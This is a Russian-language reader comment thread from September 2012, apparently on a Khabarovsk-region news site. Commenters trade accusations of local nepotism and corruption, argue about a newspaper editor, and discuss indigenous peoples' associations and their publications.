Андрею.Разве не может не возмущать неправда? Редактор уже который год пишет,что не переместилась в здание "Восход-Ванино" по причине невозможности её распространителям - инвалидам подняться на второй этаж предлагаемого  замечательного помещения.  Как известно, её распространители так по посёлку носятся с газетой, что не догонишь. У всех  в действии руки-ноги. А главное -живут они все в квартирах не на первых этажах. Выходит, кабинет нужно было ей только на первом? А как же она живёт не на первом? На работу свободно ходит. Лукавство-её обвинения и стенания.
17.09.2012 17:06:04
Граф
Эх Валентина,понятно деньги сынка надо пристраивать ,а как??? Да и командировка  не понятная?? Что может совет федерац с маленькой буквы?? Уже в наглую поперли как бульдозеры.
17.09.2012 15:42:20
гость
Да кто же их Антоша искать будет? 3ять Ланшакова начальник отдела по борьбе с экономическими преступлениями или его сват зам главы областной администрации. А начиналась эта история очень смешно, двадцать лет назад.  механика элеватора такая  избрала директором, а тут подоспело акционирование. Так он стал хозяином нового современного элеватора, со всеми вытекающими.
17.09.2012 15:15:22
Случайный прохожий
Наверно судьба тут такая, что бы каблуки упырей ощущать. Упыри оберегают интересы упырей их краевой кормушки. Ну каков социум, такова и судьба. Так тому и быть значит.
17.09.2012 14:53:21
Татьяна Седых
"Несколько лет назад я приходил в Ассоциацию, предлагал свои услуги – по созданию сайта, по выпуску газеты. Меня слушать не стали. Хорошо, я организовал свое «Объединение», выпускаю газету «Пост Хабаровска» и журнал «Абориген». Моя организация объединяет определенное количество людей, недовольных Ассоциацией. Понятно, что «Объединение» - как кость в горле тех, кто аффелирован с официальной властью..."
 
Огромное спасибо Сунгоркину и автору. В 2006 году, когда в газете "Моё побережье" я стала выпускать приложение "Сэнкэ", специально приезжала в Хабаровск и предложила в АКМНС Хабаровского края сотрудничество, но там послушали, покивали и не более того...
Статью Макса Молотова увидела только сегодня, думаю, тему продолжу...
17.09.2012 13:06:52
Андрей
Надежде без надежд и перспектив- вы что теперь  план по захвату мира в отдельном взятом районе будет воплощать на страницах этого издания?! Вы же не смогли даже подписные листы оформить надлежащим образом,куда Вы лезете управлять и руководить?! Ваш план: зарегистрироваться и топить всех и поливать вся грязхью( видишь ли, Мусиновичу как то не с руки, другие кандидаты это для него делать будут) не удался. Так теперь Вы сюда перебрались- идите отсюда, от Вас дурно пахнет.Я далек от Вашего района, но уже порядком надоела эта возня. а Татьяна молодец- в нашем обществе пор дураков и дороги нужно и можно писать каждый день, мало что изменится, но в конкретном случае с названием имен и мест сдвинется.
17.09.2012 10:41:47
Граф
Валя дала понять ты мне я тебе.Тесть ВИ ты мне лакомый кусок  отвалишь или земля или федеральный объект а я на совете  сделаю все что ты напишешь для своего министерства Всё очень просто.
17.09.2012 09:59:00
Газ Прём Мечты сбываются!
На очереди Сочи, ждем еще большего позора.
За державу обидно...
RSS